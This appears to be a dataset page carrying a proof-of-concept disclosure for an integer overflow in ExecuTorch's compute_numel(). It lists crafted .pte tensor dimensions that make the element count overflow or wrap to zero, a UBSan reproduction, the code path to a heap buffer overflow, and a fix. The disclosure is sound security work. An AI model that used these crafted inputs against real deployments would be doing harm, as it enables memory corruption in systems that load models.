The dataset viewer is not available because its heuristics could not detect any supported data files. You can try uploading some data files, or configuring the data files location manually.
PoC: ExecuTorch compute_numel() Integer Overflow
CVE: Pending
CWE: CWE-190 (Integer Overflow) → CWE-122 (Heap Buffer Overflow)
Target: pytorch/executorch
Severity: High (CVSS 7.5)
Format: .pte (FlatBuffer, identifier ET12)
Vulnerability
compute_numel() in runtime/core/portable_type/tensor_impl.cpp:41 performs unchecked signed integer multiplication when calculating the total number of elements in a tensor:
ssize_t compute_numel(const TensorImpl::SizesType* sizes, ssize_t dim) {
ssize_t numel = 1;
for (const auto i : c10::irange(dim)) {
numel *= sizes[i]; // NO OVERFLOW CHECK — signed overflow is UB
}
return numel;
}
Tensor dimensions are read from the .pte model file (FlatBuffer sizes: [int]). A malicious file with crafted dimensions causes the multiplication to overflow int64, producing an incorrect numel that propagates to nbytes() → undersized memory allocation → heap buffer overflow.
Files
| File | Description |
|---|---|
poc_executorch_numel_overflow.py |
Generator script — creates malicious .pte files and demonstrates the overflow |
poc_executorch_overflow.pte |
Crafted .pte — sizes [2147483647, 2147483647, 3] → numel overflows to negative |
poc_executorch_zero_numel.pte |
Crafted .pte — sizes [65536, 65536, 65536, 65536] → numel wraps to zero |
Exploitation Variants
Variant 1: Overflow to negative (poc_executorch_overflow.pte)
Sizes: [2147483647, 2147483647, 3]
Step 1: numel = 1 × 2147483647 = 2147483647
Step 2: numel = 2147483647 × 2147483647 = 4611686014132420609
Step 3: numel = 4611686014132420609 × 3 = OVERFLOW (> INT64_MAX)
UBSan output: signed integer overflow: 4611686014132420609 * 3 cannot be represented in type 'long int'
Variant 2: Overflow to zero (poc_executorch_zero_numel.pte)
Sizes: [65536, 65536, 65536, 65536]
Product: 65536⁴ = 2⁶⁴ → wraps to 0
nbytes = 0 × element_size = 0
→ Zero-size allocation, but tensor has 2⁶⁴ elements
→ ANY memory access is out-of-bounds
Reproduction
# 1. Generate PoC files
pip install flatbuffers
python3 poc_executorch_numel_overflow.py
# 2. Build ExecuTorch with UBSan
git clone --depth 1 https://github.com/pytorch/executorch /tmp/executorch
cd /tmp/executorch && mkdir build && cd build
cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=undefined -fno-sanitize-recover=all -g"
make -j$(nproc) executor_runner
# 3. Load malicious model → UBSan fires
./executor_runner --model_path poc_executorch_overflow.pte
Affected Code Path
Malicious .pte → Program::load() → Method::init() → parseTensor()
→ tensor_parser_portable.cpp:157 → new TensorImpl(sizes)
→ compute_numel(): numel *= sizes[i] ← OVERFLOW
→ nbytes(): numel_ × elementSize ← wrong value
→ getTensorDataPtr(nbytes) ← undersized alloc
→ kernel execution → HEAP BUFFER OVERFLOW
Fix
The same codebase already has c10::mul_overflows() in method_meta.cpp — it just needs to be applied here too:
ssize_t new_numel;
ET_CHECK_MSG(
!__builtin_mul_overflow(numel, sizes[i], &new_numel),
"Integer overflow in numel at dim %zd", i);
numel = new_numel;
- Downloads last month
- 12